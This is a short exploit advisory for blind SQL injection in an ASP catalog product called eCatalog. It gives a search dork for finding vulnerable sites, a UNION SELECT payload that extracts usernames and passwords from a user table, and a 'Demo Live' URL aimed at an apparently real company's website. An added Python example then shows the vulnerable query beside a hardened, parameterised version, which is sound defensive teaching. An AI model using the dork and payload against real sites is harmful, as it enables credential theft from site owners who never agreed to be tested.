[Blind SQL Injection] eCatalog | S4N - Soft4Newbie
————————————————————————————————————————————————————-
[-] Dork
[+] “catalog/details.asp?id=” or use your own keyword
[-] Exploit
[+] details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
[-] POC
http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
[-] Demo Live
http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
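The fix for the pattern above, as an added example that is not eCatalog's own code: the string-concatenated lookup this advisory relies on, next to a hardened lookup that validates `id` as an integer and binds it as a parameter. The `product` table, its filler columns, the sample rows and the function names are assumptions, built in an in-memory SQLite database.

```python
import sqlite3

# Constructed stand-in schema: 14 columns to match the column count of the
# UNION payload in the advisory. Only "user", "username" and "password" come
# from the page; "product" and the c2..c14 columns are assumptions.
COLS = ["id"] + [f"c{i}" for i in range(2, 15)]

# The POC's id value after URL decoding ('+' becomes a space).
PAYLOAD = ("706 union select 1,2,3,4,5,6,username,8,9,10,11,12,13,"
           "password from user")


def make_db():
    """Build a throwaway database with one product row and one user row."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE product ({', '.join(COLS)})")
    db.execute("CREATE TABLE user (username, password)")
    db.execute("INSERT INTO product VALUES (706" + ", 'x'" * 13 + ")")
    db.execute("INSERT INTO user VALUES ('admin', 'constructed-secret')")
    return db


def details_vulnerable(db, raw_id):
    """The flawed pattern: the request parameter becomes part of the SQL text."""
    return db.execute("SELECT * FROM product WHERE id=" + raw_id).fetchall()


def details_hardened(db, raw_id):
    """Accept only a short ASCII decimal id, then bind it as a parameter."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a decimal integer")
    query = "SELECT * FROM product WHERE id = ?"
    return db.execute(query, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", details_vulnerable(db, PAYLOAD))
    try:
        details_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened rejected input:", exc)
    print("hardened, valid id:", details_hardened(db, "706"))
```

In classic ASP the equivalent change is an `ADODB.Command` with a bound integer parameter in place of building the query string from `Request.QueryString`.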